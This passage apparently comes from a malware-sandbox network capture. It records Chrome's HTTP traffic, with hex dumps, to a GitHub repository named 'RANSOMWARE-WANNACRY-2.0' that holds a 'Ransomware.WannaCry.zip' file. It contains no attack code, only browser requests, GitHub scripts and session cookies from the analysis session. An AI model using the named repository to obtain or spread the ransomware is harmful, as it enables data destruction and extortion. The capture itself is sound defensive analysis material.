                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 0
                                                                                      Referrer-Policy: no-referrer-when-downgrade
                                                                                      2024-03-23 14:47:28 UTC3013INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 2e
                                                                                      Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.
                                                                                      2024-03-23 14:47:28 UTC87INData Raw: 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 63 6f 6c 6f 72 2d 66 67 2d 64 65 66 61 75 6c 74 22 3e 31 3c 2f 73 74 72 6f 6e 67 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 6f 6c 6f 72 2d 66 67 2d 6d 75 74 65 64 22 3e 42 72 61 6e 63 68 3c 2f 73 70 61 6e 3e 0a
                                                                                      Data Ascii: <strong class="color-fg-default">1</strong><span class="color-fg-muted">Branch</span>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      134192.168.2.1649842140.82.114.214436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:28 UTC757OUTPOST /github/collect HTTP/1.1
                                                                                      Host: collector.github.com
                                                                                      Connection: keep-alive
                                                                                      Content-Length: 1106
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Content-Type: text/plain;charset=UTF-8
                                                                                      Accept: */*
                                                                                      Origin: https://github.com
                                                                                      Sec-Fetch-Site: same-site
                                                                                      Sec-Fetch-Mode: no-cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Cookie: _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurich
                                                                                      2024-03-23 14:47:28 UTC1106OUTData Raw: 7b 22 63 6c 69 65 6e 74 5f 69 64 22 3a 22 31 33 35 38 37 38 36 30 38 37 2e 31 37 31 31 32 30 35 32 34 30 22 2c 22 65 76 65 6e 74 73 22 3a 5b 7b 22 70 61 67 65 22 3a 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 63 68 72 6f 6e 6f 73 6d 69 6b 69 2f 52 41 4e 53 4f 4d 57 41 52 45 2d 57 41 4e 4e 41 43 52 59 2d 32 2e 30 22 2c 22 74 69 74 6c 65 22 3a 22 52 41 4e 53 4f 4d 57 41 52 45 2d 57 41 4e 4e 41 43 52 59 2d 32 2e 30 2f 52 61 6e 73 6f 6d 77 61 72 65 2e 57 61 6e 6e 61 43 72 79 2e 7a 69 70 20 61 74 20 6d 61 73 74 65 72 20 c2 b7 20 63 68 72 6f 6e 6f 73 6d 69 6b 69 2f 52 41 4e 53 4f 4d 57 41 52 45 2d 57 41 4e 4e 41 43 52 59 2d 32 2e 30 20 c2 b7 20 47 69 74 48 75 62 22 2c 22 63 6f 6e 74 65 78 74 22 3a 7b 22 75 73 65 72 5f 69 64 22 3a 22 31 39 39 31
                                                                                      Data Ascii: {"client_id":"1358786087.1711205240","events":[{"page":"https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0","title":"RANSOMWARE-WANNACRY-2.0/Ransomware.WannaCry.zip at master chronosmiki/RANSOMWARE-WANNACRY-2.0 GitHub","context":{"user_id":"1991
                                                                                      2024-03-23 14:47:28 UTC578INHTTP/1.1 204 No Content
                                                                                      Date: Sat, 23 Mar 2024 14:47:28 GMT
                                                                                      access-control-allow-methods: POST,OPTIONS
                                                                                      access-control-allow-headers: Content-Type
                                                                                      access-control-allow-credentials: true
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Cache-Control: no-cache
                                                                                      X-Runtime: 0.072570
                                                                                      Strict-Transport-Security: max-age=631138519
                                                                                      X-Frame-Options: DENY
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      x-download-options: noopen
                                                                                      x-permitted-cross-domain-policies: none
                                                                                      x-github-backend: Kubernetes
                                                                                      X-GitHub-Request-Id: 91A2:839F:2EF738:76D74C:65FEEB80
                                                                                      connection: close


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      135192.168.2.1649847140.82.113.64436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:28 UTC758OUTPOST /_private/browser/stats HTTP/1.1
                                                                                      Host: api.github.com
                                                                                      Connection: keep-alive
                                                                                      Content-Length: 333
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Content-Type: text/plain;charset=UTF-8
                                                                                      Accept: */*
                                                                                      Origin: https://github.com
                                                                                      Sec-Fetch-Site: same-site
                                                                                      Sec-Fetch-Mode: no-cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Cookie: _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurich
                                                                                      2024-03-23 14:47:28 UTC333OUTData Raw: 7b 22 73 74 61 74 73 22 3a 20 5b 7b 22 69 6e 63 72 65 6d 65 6e 74 4b 65 79 22 3a 22 52 45 46 5f 53 45 4c 45 43 54 4f 52 5f 42 4f 4f 54 45 44 5f 46 52 4f 4d 5f 4c 4f 43 41 4c 53 54 4f 52 41 47 45 22 2c 22 74 69 6d 65 73 74 61 6d 70 22 3a 31 37 31 31 32 30 35 32 34 36 33 37 30 2c 22 6c 6f 67 67 65 64 49 6e 22 3a 66 61 6c 73 65 2c 22 73 74 61 66 66 22 3a 66 61 6c 73 65 2c 22 62 75 6e 64 6c 65 72 22 3a 22 77 65 62 70 61 63 6b 22 7d 2c 7b 22 6c 6f 6e 67 54 61 73 6b 73 22 3a 5b 7b 22 6e 61 6d 65 22 3a 22 73 65 6c 66 22 2c 22 64 75 72 61 74 69 6f 6e 22 3a 36 31 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 63 68 72 6f 6e 6f 73 6d 69 6b 69 2f 52 41 4e 53 4f 4d 57 41 52 45 2d 57 41 4e 4e 41 43 52 59 2d 32 2e 30 22 7d 5d 2c 22 74
                                                                                      Data Ascii: {"stats": [{"incrementKey":"REF_SELECTOR_BOOTED_FROM_LOCALSTORAGE","timestamp":1711205246370,"loggedIn":false,"staff":false,"bundler":"webpack"},{"longTasks":[{"name":"self","duration":61,"url":"https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0"}],"t
                                                                                      2024-03-23 14:47:28 UTC1108INHTTP/1.1 200 OK
                                                                                      Server: GitHub.com
                                                                                      Date: Sat, 23 Mar 2024 14:47:28 GMT
                                                                                      Content-Type: text/plain
                                                                                      Content-Length: 0
                                                                                      Cache-Control: no-cache
                                                                                      X-RateLimit-Limit: 60
                                                                                      X-RateLimit-Remaining: 60
                                                                                      X-RateLimit-Reset: 1711208848
                                                                                      X-RateLimit-Used: 0
                                                                                      X-RateLimit-Resource: core
                                                                                      X-GitHub-Media-Type: github.v3; format=json
                                                                                      x-github-api-version-selected: 2022-11-28
                                                                                      Access-Control-Expose-Headers: ETag, Link, Location, Retry-After, X-GitHub-OTP, X-RateLimit-Limit, X-RateLimit-Remaining, X-RateLimit-Used, X-RateLimit-Resource, X-RateLimit-Reset, X-OAuth-Scopes, X-Accepted-OAuth-Scopes, X-Poll-Interval, X-GitHub-Media-Type, X-GitHub-SSO, X-GitHub-Request-Id, Deprecation, Sunset
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                      X-Frame-Options: deny
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 0
                                                                                      Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin
                                                                                      Content-Security-Policy: default-src 'none'
                                                                                      Vary: Accept-Encoding, Accept, X-Requested-With
                                                                                      X-GitHub-Request-Id: A778:11FB:245B297:3EF3B7D:65FEEB80
                                                                                      connection: close


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      136192.168.2.1649846140.82.113.44436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:28 UTC854OUTGET /chronosmiki/RANSOMWARE-WANNACRY-2.0/used_by_list HTTP/1.1
                                                                                      Host: github.com
                                                                                      Connection: keep-alive
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: none
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Cookie: _gh_sess=Nh9kyBmEE4ZRM3VGYju9KXV5%2Bst%2FyNrmAKbX9XCtLw1boKgTs3auGGqaIH2vBFV5j3AApO%2B1ujV8H4DwCd63S09sYgnwqfIDP4bDBt0oD0D5NRasrQlv1x%2FTwFt3XLSyC6gMF2JYJzrL%2FJJghpMTpYJdsF7ey87SZHLgIArUwuB1VP7xgtzq0eOdKVJrPdKofZjFHialVn%2FYoFOn56rsHoYl04bCkg4Dch7DkCNR2AIkFD6d3919E%2BqyHufe5p93xu4JnFLMiu6pSmtVVvBTWQ%3D%3D--Si1lecK3LCVxv8U%2F--b%2B%2B%2BNLjOSr%2FJwqbiryqGZA%3D%3D; _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurich
                                                                                      2024-03-23 14:47:28 UTC436INHTTP/1.1 200 OK
                                                                                      Server: GitHub.com
                                                                                      Date: Sat, 23 Mar 2024 14:47:28 GMT
                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                      Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                      Cache-Control: no-cache
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                      X-Frame-Options: deny
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 0
                                                                                      Referrer-Policy: no-referrer-when-downgrade
                                                                                      2024-03-23 14:47:28 UTC2944INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 2e
                                                                                      Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.
                                                                                      2024-03-23 14:47:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      137192.168.2.1649850185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:28 UTC587OUTGET /assets/repositories-6a44576977d0.js HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: no-cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:28 UTC686INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 67318
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: application/javascript
                                                                                      Last-Modified: Thu, 14 Mar 2024 14:53:07 GMT
                                                                                      ETag: 0x8DC443675D5A33B
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:28 GMT
                                                                                      Age: 762315
                                                                                      X-Served-By: cache-iad-kiad7000158-IAD, cache-ewr18183-EWR
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 34, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: 0778d8c8ea53c7effdad8b23b48a413de844d89e
                                                                                      2024-03-23 14:47:28 UTC16384INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 3d 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 72 65 70 6f 73 69 74 6f 72 69 65 73 22 2c 22 75 69 5f 70 61 63 6b 61 67 65 73 5f 73 6f 66 74 2d 6e 61 76 69 67 61 74 65 5f 73 6f 66 74 2d 6e 61 76 69 67 61 74 65 5f 74 73 22 5d 2c 7b 37 33 38 39 33 3a 28 65 2c 74 2c 72 29 3d 3e 7b 6c 65 74 20 6e 2c 6f 3b 72 2e 64 28 74 2c 7b 6c 4f 3a 28 29 3d 3e 66 2c 71 41 3a 28 29 3d 3e 75 2c 79 30 3a 28 29 3d 3e 73 7d 29 3b 6c 65 74 20 69 3d 5b 5d 2c 61 3d 30 3b 66 75 6e 63 74 69 6f 6e 20 73 28 29 7b 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 29 7b 74 72 79 7b 72 65 74 75 72 6e 20
                                                                                      Data Ascii: "use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["repositories","ui_packages_soft-navigate_soft-navigate_ts"],{73893:(e,t,r)=>{let n,o;r.d(t,{lO:()=>f,qA:()=>u,y0:()=>s});let i=[],a=0;function s(){return n}function l(){try{return
                                                                                      2024-03-23 14:47:28 UTC16384INData Raw: 75 65 2e 74 72 69 6d 28 29 2e 6c 65 6e 67 74 68 3e 30 2c 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6c 65 74 20 74 3d 65 2e 66 6f 72 6d 2c 72 3d 65 2e 76 61 6c 75 65 2e 74 72 69 6d 28 29 3b 69 66 28 72 29 7b 6c 65 74 20 65 3d 6e 65 77 20 55 52 4c 28 74 2e 61 63 74 69 6f 6e 2c 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 6f 72 69 67 69 6e 29 2c 6e 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 28 65 2e 73 65 61 72 63 68 2e 73 6c 69 63 65 28 31 29 29 2c 6f 3d 74 2e 65 6c 65 6d 65 6e 74 73 2e 6e 61 6d 65 64 49 74 65 6d 28 22 75 74 66 38 22 29 3b 72 65 74 75 72 6e 20 6f 20 69 6e 73 74 61 6e 63 65 6f 66 20 48 54 4d 4c 49 6e 70 75 74 45 6c 65 6d 65 6e 74 26 26 6e 2e 61 70 70 65 6e 64 28 22 75 74 66 38 22 2c 6f 2e 76 61 6c 75 65 29 2c 6e 2e 61 70
                                                                                      Data Ascii: ue.trim().length>0,t=function(e){let t=e.form,r=e.value.trim();if(r){let e=new URL(t.action,window.location.origin),n=new URLSearchParams(e.search.slice(1)),o=t.elements.namedItem("utf8");return o instanceof HTMLInputElement&&n.append("utf8",o.value),n.ap
                                                                                      2024-03-23 14:47:28 UTC16384INData Raw: 65 22 29 2c 6f 3d 21 28 72 26 26 72 2e 63 68 65 63 6b 65 64 26 26 72 2e 64 65 66 61 75 6c 74 56 61 6c 75 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 6e 2e 76 61 6c 75 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 3b 74 2e 68 69 64 64 65 6e 3d 6f 3b 6c 65 74 20 69 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 23 72 65 70 6f 2d 6e 61 6d 65 2d 73 75 67 67 65 73 74 69 6f 6e 22 29 3b 69 2e 68 69 64 64 65 6e 3d 21 6f 7d 7d 3b 61 73 79 6e 63 20 66 75 6e 63 74 69 6f 6e 20 44 28 65 29 7b 72 65 74 75 72 6e 28 30 2c 73 2e 61 5f 29 28 64 6f 63 75 6d 65 6e 74 2c 65 29 7d 61 73 79 6e 63 20 66 75 6e 63 74 69 6f 6e 20 49 28 65 29 7b 6c 65 74 20 74 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 70 75 6c 73 65 2d
                                                                                      Data Ascii: e"),o=!(r&&r.checked&&r.defaultValue.toLowerCase()===n.value.toLowerCase());t.hidden=o;let i=document.querySelector("#repo-name-suggestion");i.hidden=!o}};async function D(e){return(0,s.a_)(document,e)}async function I(e){let t=e.getAttribute("data-pulse-
                                                                                      2024-03-23 14:47:28 UTC16384INData Raw: 65 22 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6c 65 74 7b 61 74 74 61 63 68 6d 65 6e 74 3a 74 2c 62 61 74 63 68 3a 72 7d 3d 65 2e 64 65 74 61 69 6c 2c 6e 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 2e 6a 73 2d 6d 61 6e 69 66 65 73 74 2d 63 6f 6d 6d 69 74 2d 66 69 6c 65 2d 74 65 6d 70 6c 61 74 65 22 29 2c 6f 3d 6e 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 2e 6a 73 2d 6d 61 6e 69 66 65 73 74 2d 66 69 6c 65 2d 65 6e 74 72 79 22 29 2e 63 6c 6f 6e 65 4e 6f 64 65 28 21 30 29 2c 69 3d 6f 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 2e 6a 73 2d 66 69 6c 65 6e 61 6d 65 22 29 3b 69 2e 74 65 78 74 43 6f 6e 74 65 6e 74 3d 74 2e 66 75 6c 6c 50 61 74 68 3b 6c 65 74 20 61 3d 74 2e 69 64 2c 73 3d 6f 2e 71 75 65 72 79 53 65 6c 65 63
                                                                                      Data Ascii: e",function(e){let{attachment:t,batch:r}=e.detail,n=document.querySelector(".js-manifest-commit-file-template"),o=n.querySelector(".js-manifest-file-entry").cloneNode(!0),i=o.querySelector(".js-filename");i.textContent=t.fullPath;let a=t.id,s=o.querySelec
                                                                                      2024-03-23 14:47:28 UTC1782INData Raw: 53 63 72 69 70 74 55 52 4c 3a 61 28 22 63 72 65 61 74 65 53 63 72 69 70 74 55 52 4c 22 29 7d 2c 6c 3d 28 6e 3d 67 6c 6f 62 61 6c 54 68 69 73 29 2e 5f 5f 54 52 55 53 54 45 44 5f 54 59 50 45 5f 50 4f 4c 49 43 49 45 53 5f 5f 3f 3f 28 6e 2e 5f 5f 54 52 55 53 54 45 44 5f 54 59 50 45 5f 50 4f 4c 49 43 49 45 53 5f 5f 3d 6e 65 77 20 4d 61 70 29 2c 63 3d 67 6c 6f 62 61 6c 54 68 69 73 2e 74 72 75 73 74 65 64 54 79 70 65 73 3f 3f 7b 63 72 65 61 74 65 50 6f 6c 69 63 79 3a 28 65 2c 74 29 3d 3e 28 7b 6e 61 6d 65 3a 65 2c 2e 2e 2e 73 2c 2e 2e 2e 74 7d 29 7d 2c 64 3d 7b 63 72 65 61 74 65 50 6f 6c 69 63 79 3a 28 65 2c 74 29 3d 3e 7b 69 66 28 6c 2e 68 61 73 28 65 29 29 72 65 74 75 72 6e 28 30 2c 69 2e 62 29 28 7b 69 6e 63 72 65 6d 65 6e 74 4b 65 79 3a 22 54 52 55 53 54 45
                                                                                      Data Ascii: ScriptURL:a("createScriptURL")},l=(n=globalThis).__TRUSTED_TYPE_POLICIES__??(n.__TRUSTED_TYPE_POLICIES__=new Map),c=globalThis.trustedTypes??{createPolicy:(e,t)=>({name:e,...s,...t})},d={createPolicy:(e,t)=>{if(l.has(e))return(0,i.b)({incrementKey:"TRUSTE


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      138192.168.2.1649841140.82.114.44436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:28 UTC1116OUTGET /chronosmiki/RANSOMWARE-WANNACRY-2.0/tag-count HTTP/1.1
                                                                                      Host: github.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      X-Requested-With: XMLHttpRequest
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      GitHub-Verified-Fetch: true
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: same-origin
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Cookie: _gh_sess=Nh9kyBmEE4ZRM3VGYju9KXV5%2Bst%2FyNrmAKbX9XCtLw1boKgTs3auGGqaIH2vBFV5j3AApO%2B1ujV8H4DwCd63S09sYgnwqfIDP4bDBt0oD0D5NRasrQlv1x%2FTwFt3XLSyC6gMF2JYJzrL%2FJJghpMTpYJdsF7ey87SZHLgIArUwuB1VP7xgtzq0eOdKVJrPdKofZjFHialVn%2FYoFOn56rsHoYl04bCkg4Dch7DkCNR2AIkFD6d3919E%2BqyHufe5p93xu4JnFLMiu6pSmtVVvBTWQ%3D%3D--Si1lecK3LCVxv8U%2F--b%2B%2B%2BNLjOSr%2FJwqbiryqGZA%3D%3D; _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurich
                                                                                      2024-03-23 14:47:28 UTC506INHTTP/1.1 200 OK
                                                                                      Server: GitHub.com
                                                                                      Date: Sat, 23 Mar 2024 14:47:28 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                      ETag: W/"8902c7088699d5c25402933819980cd9"
                                                                                      Cache-Control: max-age=0, private, must-revalidate
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                      X-Frame-Options: deny
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 0
                                                                                      Referrer-Policy: no-referrer-when-downgrade
                                                                                      2024-03-23 14:47:28 UTC3013INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 2e
                                                                                      Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.
                                                                                      2024-03-23 14:47:28 UTC85INData Raw: 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 63 6f 6c 6f 72 2d 66 67 2d 64 65 66 61 75 6c 74 22 3e 30 3c 2f 73 74 72 6f 6e 67 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 6f 6c 6f 72 2d 66 67 2d 6d 75 74 65 64 22 3e 54 61 67 73 3c 2f 73 70 61 6e 3e 0a
                                                                                      Data Ascii: <strong class="color-fg-default">0</strong><span class="color-fg-muted">Tags</span>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      139192.168.2.1649851140.82.113.44436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:28 UTC862OUTGET /chronosmiki/RANSOMWARE-WANNACRY-2.0/latest-commit/master HTTP/1.1
                                                                                      Host: github.com
                                                                                      Connection: keep-alive
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: none
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
